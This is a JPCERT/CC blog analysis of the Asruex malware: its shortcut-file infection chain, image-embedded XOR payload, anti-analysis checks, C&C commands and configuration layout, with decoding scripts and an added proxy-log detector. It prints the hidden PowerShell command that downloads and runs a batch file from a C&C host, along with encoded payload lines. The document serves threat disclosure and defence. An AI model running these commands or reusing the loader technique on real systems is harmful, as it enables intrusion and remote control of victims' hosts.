JPCERT/CC has been observing malicious shortcut files that are sent as email attachments to a limited range of organisations since around October 2015. When this shortcut file is opened, the host is infected with malware called “Asruex”. The malware has a remote control function, and the attackers sending these emails appear to use it to intrude into the targets’ networks. According to a blog article by Microsoft, the malware is associated with an attacker group identified as “DarkHotel” (Microsoft calls it "Dubnium"). This blog entry introduces the details of Asruex.
Infection Mechanism of Asruex
Figure 1 describes the chain of events after a victim opens the malicious shortcut file until the host gets infected with Asruex.
For those cases that JPCERT/CC has observed, when the shortcut file is opened, a downloader is downloaded from a C&C server and then executed. The downloader then downloads Asruex from another C&C server, which is then executed. Detailed behaviour observed in each phase will be explained in the next section.
Details of the Shortcut File
When the malicious shortcut file is opened, the following PowerShell command in the file is executed.
powershell -windowstyle hidden $c='(new-object System.Net.WebClient).D'+'ownloadFile("""http://online-dropbox.com/online/a """, """$env:tmp\gst.bat""")';Invoke-Expression $c&%tmp%\gst.bat "%CD%"
The above PowerShell command downloads a file from the specified URL and saves it as a batch file, which is then executed. The batch file contains the following commands, including two encoded PowerShell commands (the powershell -Enc lines) that fetch the payloads.
echo powershell -Enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUw…
chcp 65001
cd "%tmp%"
start winword "article_draft.docx"
copy "article_draft.docx" "%1"
del /f "%1\*.*.lnk"
echo powershell -Enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMA…
"%tmp%\dwm.exe"
When the batch file is executed, a Windows executable file (a downloader) and a decoy document for display are downloaded from a C&C server, saved in the %TEMP% folder and then executed. Most of the decoy documents are written in Japanese, but some are in Chinese, which implies that the targets of this attack are not limited to Japanese organisations.
Details of the Downloader
When the downloader is executed, it downloads a .jpg or .gif image file. Encoded Asruex is contained in the latter part of the image file. The downloader decodes it and then executes the malware.
Asruex contained in the image file is encoded using XOR. The following Python script is used for decoding the encoded data of the image file. The size of the encoded data is specified in the last 4 bytes of the image file.
import struct

(length,) = struct.unpack("=I", image_data[-4:])  # size of the encoded data, stored in the last 4 bytes of the image
buf = list(image_data[-4 - length:-4])            # the encoded data sits immediately before the size field
key = 0x1D  # Keys may vary depending on the sample
for i in range(0, length):
    buf[i] = chr(ord(buf[i]) ^ key)
    key += 0x5D
    key &= 0xff
decoded = "".join(buf)  # decoded Asruex executable
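The following is an added example (not the article's script) that carves the appended payload out of a downloaded image and decodes it with the rolling XOR described above, checking the size trailer and the MZ header so a wrong key or layout is reported instead of silently producing garbage. The little-endian trailer, the initial key 0x1D and the sample image are assumptions, and the image bytes are constructed here.

```python
import struct

# Added example: recover the Asruex executable appended to a .jpg/.gif.
# Layout per the article: [image bytes][encoded payload][4-byte size of payload].
# Rolling XOR: byte ^= key; key = (key + 0x5D) & 0xFF. Initial key is sample-specific.

def decode_rolling_xor(encoded: bytes, key: int = 0x1D) -> bytes:
    out = bytearray()
    for b in encoded:
        out.append(b ^ key)
        key = (key + 0x5D) & 0xFF
    return bytes(out)

def encode_rolling_xor(plain: bytes, key: int = 0x1D) -> bytes:
    # XOR with the same key stream is its own inverse; used to build the sample below.
    return decode_rolling_xor(plain, key)

def extract_payload(image: bytes, key: int = 0x1D) -> bytes:
    """Return the decoded payload appended to the image; raise ValueError on bad layout."""
    if len(image) < 4:
        raise ValueError("too short to carry a size trailer")
    (size,) = struct.unpack("<I", image[-4:])   # assumed little-endian size trailer
    if size == 0 or size + 4 > len(image):
        raise ValueError("trailer size %d inconsistent with file length %d" % (size, len(image)))
    encoded = image[-4 - size:-4]
    payload = decode_rolling_xor(encoded, key)
    if payload[:2] != b"MZ":
        raise ValueError("decoded data is not a PE file; wrong key or layout?")
    return payload

# Constructed sample: a fake JPEG header followed by an encoded dummy "PE" and its size.
FAKE_PE = b"MZ" + b"\x90" * 30 + b"This program cannot be run in DOS mode."
SAMPLE_IMAGE = (b"\xff\xd8\xff\xe0" + b"JFIF-dummy-image-bytes" * 4
                + encode_rolling_xor(FAKE_PE) + struct.pack("<I", len(FAKE_PE)))

if __name__ == "__main__":
    print(extract_payload(SAMPLE_IMAGE)[:2])  # b'MZ'
```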
The downloader may also contain an encoded executable of Process Hacker (a multi-function task manager), which it executes if anti-virus software is detected. Anti-virus software such as that from Symantec, McAfee and Kaspersky is detected based on process names.
Details of Asruex
Asruex is a kind of malware that communicates with a C&C server over HTTP and executes the commands it receives. It has various anti-analysis features, such as refusing to run when it detects a virtual machine. Please refer to Appendix A for the conditions under which Asruex decides it is running in an analysis environment. The malware is also capable of detecting anti-virus software.
If Asruex does not detect a virtual machine, it executes one of the following executable files and injects into it a DLL file contained in Asruex. If it detects anti-virus software, Asruex instead writes out the DLL file and loads it into its own process (no DLL injection). This DLL file contains the core functions of Asruex.
The DLL, whether injected or loaded directly, first sends an HTTP request to a dummy host. If it receives a reply with a status code of 100 or greater, it connects to the actual C&C server with a request such as the following:
GET /table/list.php?a1=6fcadf059e54a19c7b96b0758a2d20a4396b85e77138dbaff3fddd04909de9162a8910eab1141343492e90a78e75bfa7cafa3ed0a51740daa4cad36291e637074255217 –omitted- HTTP/1.1
Connection: Keep-Alive
Content-Type: text/plain; charset=utf-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Host: [host name]
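As an added example (not from the article), the request above can be turned into a simple detection over proxy logs: the hard-coded User-Agent (Chrome 27 on Windows NT 5.1, long outdated) and a GET to /table/list.php with a long hexadecimal a1 parameter are both flagged. The log line format is a constructed, simplified Squid-like layout and is an assumption; the sample lines are constructed, and the hosts in them are placeholders.

```python
import re

# Added example: flag proxy log lines resembling Asruex C&C traffic.
# Assumed log format: <timestamp> <client> "<METHOD> <host><path>" <status> "<user-agent>"
ASRUEX_UA = ("Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) "
             "Chrome/27.0.1453.116 Safari/537.36")
C2_PATH = re.compile(r"^/table/list\.php\?a1=[0-9a-f]{64,}$")
LOG_LINE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) "(?P<method>[A-Z]+) (?P<host>[^/ ]+)'
                      r'(?P<path>\S*)" (?P<status>\d{3}) "(?P<ua>[^"]*)"$')

def classify(line: str):
    """Return the reasons a line looks like Asruex C&C traffic ([] if it looks clean)."""
    m = LOG_LINE.match(line.rstrip("\n"))
    if not m:
        return ["unparsable"]
    reasons = []
    if m.group("ua") == ASRUEX_UA:
        reasons.append("asruex-user-agent")
    if m.group("method") == "GET" and C2_PATH.match(m.group("path")):
        reasons.append("asruex-c2-path")
    return reasons

def scan(lines):
    """Yield (client, host, reasons) for every line that is flagged."""
    for line in lines:
        reasons = classify(line)
        if reasons:
            m = LOG_LINE.match(line.rstrip("\n"))
            yield ((m.group("src"), m.group("host"), reasons) if m else ("?", "?", reasons))

# Constructed sample: one benign line, the C&C request, and the dummy-host probe
# (the probe carries only the odd User-Agent, and any status >= 100 satisfies the malware).
SAMPLE_LOGS = [
    '2016-06-01T10:00:01Z 10.0.0.5 "GET www.example.com/index.html" 200 "Mozilla/5.0 (Windows NT 10.0) Chrome/51.0"',
    '2016-06-01T10:00:07Z 10.0.0.9 "GET c2.example/table/list.php?a1=' + "6f" * 40 + '" 200 "' + ASRUEX_UA + '"',
    '2016-06-01T10:00:09Z 10.0.0.9 "GET dummy.example/" 404 "' + ASRUEX_UA + '"',
]

if __name__ == "__main__":
    for src, host, reasons in scan(SAMPLE_LOGS):
        print(src, host, reasons)
```

Matching on the User-Agent alone catches the dummy-host probe that precedes the real C&C contact, so a UA-only hit from a single host is worth correlating with the hosts listed in Appendix D.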
Asruex operates based on configuration information stored inside itself. The configuration information includes the C&C servers and dummy hosts it connects to, version information, and a key for decoding data that is delivered to it. For further details on the configuration information, please refer to Appendix B.
The configuration information is encoded. It can be decoded with the following Python code:
import struct

# rand_with_seed() and lznt1_decompress() are helper functions not shown in this article
decode_data = []
(config_size,) = struct.unpack("=I", data[offset:offset+4])   # size of the encoded configuration
config_offset = offset + 4
encode_config = data[config_offset:config_offset+config_size]
i = 0
seed = config_size * 2  # It does not necessarily double
while i < config_size:
    (result, seed) = rand_with_seed(seed)   # seeded PRNG; each output byte is the XOR key
    result &= 0xff
    decode_data.append(chr(ord(encode_config[i]) ^ result))
    i += 1
decode_config = "".join(decode_data)
# the last 4 bytes of the XOR-decoded block hold the decompressed size
(decode_size,) = struct.unpack("=I", decode_config[config_size-4:config_size])
config = lznt1_decompress(decode_config, config_size, decode_size)
Asruex executes commands that are received from a C&C server. Commands that are possibly executed are listed in Table 1. Most of the commands are used for collecting information, but some are for downloading DLL files (AdvProv.dll) from C&C servers and for executing them. AdvProv.dll is a plug-in to expand functions of Asruex.
Table 1: Commands executed by Asruex

| Command | Function |
|---|---|
| 1 | Collect information of infected hosts |
| 2 | Obtain process list |
| 3 | Obtain file list |
| 4 | Change waiting time |
| 5 | Obtain version information |
| 501 | Obtain folder list |
| - | Execute external DLL (AdvProv.dll) |
Details of AdvProv.dll
AdvProv.dll is encrypted using XOR and 3DES. The decryption key is calculated from the destination URL and the encoding key of the configuration information. Asruex downloads the DLL, loads it into memory and calls the DLL’s export function, Get_CommandProc. AdvProv.dll adds the following commands to Asruex:
Table 2: Commands added by AdvProv.dll

| Command | Function |
|---|---|
| 102 | Copy a file |
| 103 | Change a file name |
| 104 | Change file time |
| 105 | Delete a file |
| 106 | Terminate a process |
| 107 | Search a registry |
| 108 | Show a registry entry |
| 109 | Create a registry entry |
| 110 | Show a registry entry |
| 111 | Delete a registry entry |
| 601 | Download and execute a file |
Samples of AdvProv.dll that JPCERT/CC has observed had the listed functions. However, there may be some other versions with different functions.
Asruex is a relatively new kind of malware that has been seen since around October 2015. It is likely that targeted attacks using Asruex will continue.
Hash values of the artifacts discussed in this article are listed in Appendix C, and the destination URLs confirmed by JPCERT/CC are listed in Appendix D. We recommend checking that hosts in your organisation are not accessing these URLs.
Thanks for reading.
- Shusei Tomonaga
(Translated by Yukako Uchida)
Reference: Microsoft - Reverse-engineering DUBNIUM
Appendix A: Conditions where Asruex detects an analysis environment
If Asruex detects itself being operated in an environment under any of the following conditions (Table A-1 to A-6), it recognises that it is an analysis environment and stops running.
Table A-1: The computer name and user name match one of the listed combinations.
Table A-2: One of the loaded modules exports any of the listed functions.
Table A-3: Any of the listed file names exists.
Table A-4: Any of the listed processes is running.
Table A-5: A module loaded in a running process matches one of the listed module and version combinations.
Table A-6: The disk name contains any of the listed strings.
Table A-1 columns: Computer Name | User Name
Table A-6 entry: MS VirtualSCSI Disk Device
Appendix B: Configuration Information
| Offset | Size (bytes) | Contents |
|---|---|---|
| 0x114 | 64 * 3 | Dummy URLs to connect to × 3 |
| 0x1D4 | 256 * 3 | HTTP Access URLs × 3 |
| 0x4D4 | 256 | Sending data store path 1 |
| 0x5D4 | 64 | Sending data strings 1 |
| 0x614 | 256 | Sending data store path 2 |
| 0x714 | 64 | Sending data strings 2 |
| 0x798 | 256 * 3 | File name × 3 |
| 0xA98 | 4 | Machine information (pointer) |
| 0xA9C | 4 | Connect destination (pointer) |
| 0xAA0 | 4 | Not in use |
Appendix C: SHA-256 Hash Value of Artifacts
Appendix D: Hosts that Asruex connects to